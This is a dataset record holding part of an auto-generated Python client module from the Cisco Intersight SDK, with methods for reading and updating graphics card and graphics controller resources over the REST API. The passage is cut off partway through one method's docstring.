blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e30846293cbee3d68c2188e6581dc18878084898
|
e56214188faae8ebfb36a463e34fc8324935b3c2
|
/intersight/api/graphics_api.py
|
12b65e3024d8b135e38e989cf34b0a0185bfea6c
|
[
"Apache-2.0"
] |
permissive
|
CiscoUcs/intersight-python
|
866d6c63e0cb8c33440771efd93541d679bb1ecc
|
a92fccb1c8df4332ba1f05a0e784efbb4f2efdc4
|
refs/heads/master
| 2021-11-07T12:54:41.888973 | 2021-10-25T16:15:50 | 2021-10-25T16:15:50 | 115,440,875 | 25 | 18 |
Apache-2.0
| 2020-03-02T16:19:49 | 2017-12-26T17:14:03 |
Python
|
UTF-8
|
Python
| false | false | 64,543 |
py
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class GraphicsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_graphics_card_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_card_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_graphics_card_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_graphics_card_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_graphics_card_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCard', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_card_list(self, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCardList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_card_list_with_http_info(**
kwargs) # noqa: E501
def get_graphics_card_list_with_http_info(self, **kwargs): # noqa: E501
"""Read a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_card_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCardList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_graphics_card_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCardList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_controller_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_controller_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_graphics_controller_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_graphics_controller_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_graphics_controller_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Controllers/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsController', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_graphics_controller_list(self, **kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsControllerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_graphics_controller_list_with_http_info(
**kwargs) # noqa: E501
def get_graphics_controller_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_graphics_controller_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsControllerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_graphics_controller_list" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Controllers',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsControllerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_graphics_card(self, moid, graphics_card, **kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_card(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_graphics_card_with_http_info(moid, graphics_card,
**kwargs) # noqa: E501
def patch_graphics_card_with_http_info(self, moid, graphics_card,
**kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_card_with_http_info(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid', 'graphics_card'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method patch_graphics_card" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `patch_graphics_card`"
) # noqa: E501
# verify the required parameter 'graphics_card' is set
if self.api_client.client_side_validation and (
'graphics_card' not in local_var_params or # noqa: E501
local_var_params['graphics_card'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `graphics_card` when calling `patch_graphics_card`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'graphics_card' in local_var_params:
body_params = local_var_params['graphics_card']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params[
'Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json',
'application/json-patch+json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/graphics/Cards/{Moid}',
'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphicsCard', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_graphics_controller(self, moid, graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_controller(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_graphics_controller_with_http_info(
moid, graphics_controller, **kwargs) # noqa: E501
def patch_graphics_controller_with_http_info(self, moid,
graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_graphics_controller_with_http_info(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
